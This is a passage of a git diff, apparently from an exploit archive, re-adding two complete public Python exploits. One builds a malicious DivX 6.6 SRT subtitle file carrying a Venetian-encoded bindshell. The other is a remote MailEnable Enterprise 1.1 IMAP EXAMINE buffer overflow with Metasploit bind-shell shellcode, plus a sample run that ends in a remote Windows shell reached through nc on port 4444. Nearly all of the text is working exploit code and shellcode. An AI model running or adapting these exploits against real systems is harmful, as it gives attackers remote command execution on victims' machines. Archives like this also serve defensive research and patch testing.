-"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80" -"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD" -"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D" -"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40" -"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D" -"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80" -"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74" -"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D" -"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40" -"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D" -"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80" -"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D" -"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40" -"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D" -"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80" -"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A" -"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D" -"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" -"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80" -"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52" -"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) - -f=open(file,'w') -f.write("1 \n") -f.write("00:00:01,001 --> 00:00:02,001\n") -f.write(bindshell) -f.close() -print "DivX 6.6 SEH SRT Overflow - PoC\n"; -print "http://www.offensive-security.com/0day/divx66.py.txt\n"; -print "SRT has been created - ph33r \n"; - -# milw0rm.com [2008-04-18] +#!/usr/bin/python +####################################################################### +# DivX 6.6 SRT SEH overwrite PoC +# Tested on XP SP2 +# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD +# muts..at..offensive-security...dot..com +# chris..at..offensive-security...dot..com +# http://www.offensive-security.com/0day/divx66.py.txt +# Notes: Unicode buffer - real pita. +# Greetz to our wives - thanks for the couch! +####################################################################### +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# C:\Documents and Settings\Administrator\Desktop> +####################################################################### +# file = name of avi video file +file="infidel.srt" + +# Unicode friendly POP POP RET somewhere in DivX 6.6 +# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods + +ret="\x94\x48" + +# Align stack for register save +nudge="\x48\x6d" + +# Payload building blocks + +buffer="\x41" * 1032 + +xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop + +pushad="\x60\x6d" # Save stack registers,nop + +pushfd="\x9c\x6d" + +align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer + +align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd + +popfd="\x9D\x6D" # popfd,nop + +popad="\x61\x6D"# popad,nop + +padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode + +rest= "\x01" * 5000000 # Buffer and shellcode canvas + +# PoC Venetian Bindshell on port 4444 - ph33r +# Built on alternating 00 01 surface +# Venetian self decoding bindshell - 1580 bytes + +bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer + +"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80" +"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D" +"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40" +"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D" +"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80" +"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE" +"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D" +"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40" +"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D" +"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" +"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF" +"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D" +"\x40\x6D\x80\xBF\x6D\x40\x6D" +"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80" +"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2" +"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D" +"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40" +"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D" +"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80" +"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C" +"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D" +"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02" +"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D" +"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40" +"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D" +"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" +"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F" +"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D" +"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40" +"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80" +"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D" +"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40" +"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D" +"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80" +"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67" +"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D" +"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40" +"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D" +"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80" +"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54" +"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D" +"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40" +"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D" +"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80" +"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52" +"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D" +"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40" +"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" +"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80" +"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94" +"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D" +"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40" +"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D" +"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80" +"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3" +"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D" +"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40" +"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" +"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80" +"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56" +"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D" +"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40" +"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80" +"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D" +"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40" +"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" +"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80" +"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58" +"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D" +"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40" +"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D" +"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80" +"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD" +"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D" +"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40" +"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D" +"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80" +"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74" +"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D" +"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40" +"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D" +"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80" +"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE" +"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D" +"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40" +"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D" +"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80" +"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A" +"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D" +"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40" +"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" +"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80" +"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52" +"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D" +"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest) + +f=open(file,'w') +f.write("1 \n") +f.write("00:00:01,001 --> 00:00:02,001\n") +f.write(bindshell) +f.close() +print "DivX 6.6 SEH SRT Overflow - PoC\n"; +print "http://www.offensive-security.com/0day/divx66.py.txt\n"; +print "SRT has been created - ph33r \n"; + +# milw0rm.com [2008-04-18] diff --git a/platforms/windows/remote/1378.py b/platforms/windows/remote/1378.py index 7ef9e8b8e..936feab9e 100755 --- a/platforms/windows/remote/1378.py +++ b/platforms/windows/remote/1378.py @@ -1,136 +1,136 @@ -#!/usr/bin/python -############################################################ -# -# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow -# Discovered and exploited by mati@see-security.com -# This vulnerability affects Mailenable Enterprise 1.1 -# *without* the ME-10009.EXE patch. -# -# Details: -# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command. -# * Filtering of 0x00 0x0a 0x0d 0x20 0x22 -# * No space for shellcode, so 1st stage shellcode is used to -# jump back 512 bytes into the bindshell (2nd stage) shellcode. -# -# Thanks: -# * My wife - for putting up with my obesssions -# * Talz - for helping me out with the 1st stage shellcode -# -# FOR EDUCATION PURPOSES ONLY! -############################################################ -# 1st stage shellcode: -############################################################ -# [BITS 32] -# -# global _start -# -# _start: -# -# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams -# -# ;--- copy eip into ecx -# fldz -# fnstenv [esp-12] -# pop ecx -# add cl, 10 -# nop -# ;---------------------------------------------------------------------- -# dec ch ; ecx=-256; -# dec ch ; ecx=-256; -# jmp ecx ; lets jmp ecx (current location - 512) -############################################################ -# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp -# -# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch. -# Discovered / Coded by mati@see-security.com -# -# [+] Connecting to 192.168.1.160 -# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06 -# [+] Logging in as ftp -# [+] a001 OK LOGIN completed -# [+] Sending evil buffer... -# [+] Done -# -# [+] Try connecting to port 4444 on victim IP - Muhahaha! -# -# root@slax:/tmp# nc -nv 192.168.1.160 4444 -# (UNKNOWN) [192.168.1.160] 4444 (krb524) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# C:\WINNT\system32> -##################################################### - -import sys -import struct -import socket -from time import sleep - -if len(sys.argv)!=5: - print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch." - print "\nDiscovered / Coded by mati@see-security.com\n" - print "Usage: %s \n" %sys.argv[0] - sys.exit(0) - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - -# Return Address - Win2k SP4 jmp ebx -returnaddress = "\x66\x4a\x4e\x7c" - -# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes -# First Stage Shellcode - -sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c" -sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b" -sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30" - -# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com -# Second Stage Shellcode - -sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa" -sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5" -sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1" -sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3" -sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02" -sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1" -sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1" -sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a" -sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa" -sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28" -sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79" -sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb" -sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42" -sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63" -sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d" -sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a" -sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07" -sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5" -sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b" -sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa" -sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a" -sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a" - -buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc - -print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch." -print "Discovered / Coded by mati@see-security.com\n" -print "[+] Connecting to " + sys.argv[1] -try: - s.connect((sys.argv[1],int(sys.argv[2]))) -except: - print "Could not connect to IMAP server!" - sys.exit(0) - -data=s.recv(1024) -print "[+] "+data.rstrip() -print "[+] Logging in as %s" % sys.argv[3] -s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n') -data = s.recv(1024) -print "[+] "+data.rstrip() -print "[+] Sending evil buffer..." -s.send('A001 EXAMINE ' + buffer+'\r\n') -s.close() -print "[+] Done\n" -print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n" - -# milw0rm.com [2005-12-19] +#!/usr/bin/python +############################################################ +# +# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow +# Discovered and exploited by mati@see-security.com +# This vulnerability affects Mailenable Enterprise 1.1 +# *without* the ME-10009.EXE patch. +# +# Details: +# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command. +# * Filtering of 0x00 0x0a 0x0d 0x20 0x22 +# * No space for shellcode, so 1st stage shellcode is used to +# jump back 512 bytes into the bindshell (2nd stage) shellcode. +# +# Thanks: +# * My wife - for putting up with my obesssions +# * Talz - for helping me out with the 1st stage shellcode +# +# FOR EDUCATION PURPOSES ONLY! +############################################################ +# 1st stage shellcode: +############################################################ +# [BITS 32] +# +# global _start +# +# _start: +# +# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams +# +# ;--- copy eip into ecx +# fldz +# fnstenv [esp-12] +# pop ecx +# add cl, 10 +# nop +# ;---------------------------------------------------------------------- +# dec ch ; ecx=-256; +# dec ch ; ecx=-256; +# jmp ecx ; lets jmp ecx (current location - 512) +############################################################ +# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp +# +# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch. +# Discovered / Coded by mati@see-security.com +# +# [+] Connecting to 192.168.1.160 +# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06 +# [+] Logging in as ftp +# [+] a001 OK LOGIN completed +# [+] Sending evil buffer... +# [+] Done +# +# [+] Try connecting to port 4444 on victim IP - Muhahaha! +# +# root@slax:/tmp# nc -nv 192.168.1.160 4444 +# (UNKNOWN) [192.168.1.160] 4444 (krb524) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# C:\WINNT\system32> +##################################################### + +import sys +import struct +import socket +from time import sleep + +if len(sys.argv)!=5: + print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch." + print "\nDiscovered / Coded by mati@see-security.com\n" + print "Usage: %s \n" %sys.argv[0] + sys.exit(0) + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Return Address - Win2k SP4 jmp ebx +returnaddress = "\x66\x4a\x4e\x7c" + +# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes +# First Stage Shellcode + +sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c" +sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b" +sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30" + +# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com +# Second Stage Shellcode + +sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa" +sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5" +sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1" +sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3" +sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02" +sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1" +sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1" +sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a" +sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa" +sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28" +sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79" +sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb" +sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42" +sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63" +sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d" +sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a" +sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07" +sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5" +sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b" +sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa" +sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a" +sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a" + +buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc + +print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch." +print "Discovered / Coded by mati@see-security.com\n" +print "[+] Connecting to " + sys.argv[1] +try: + s.connect((sys.argv[1],int(sys.argv[2]))) +except: + print "Could not connect to IMAP server!" + sys.exit(0) + +data=s.recv(1024) +print "[+] "+data.rstrip() +print "[+] Logging in as %s" % sys.argv[3] +s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n') +data = s.recv(1024) +print "[+] "+data.rstrip() +print "[+] Sending evil buffer..." +s.send('A001 EXAMINE ' + buffer+'\r\n') +s.close() +print "[+] Done\n" 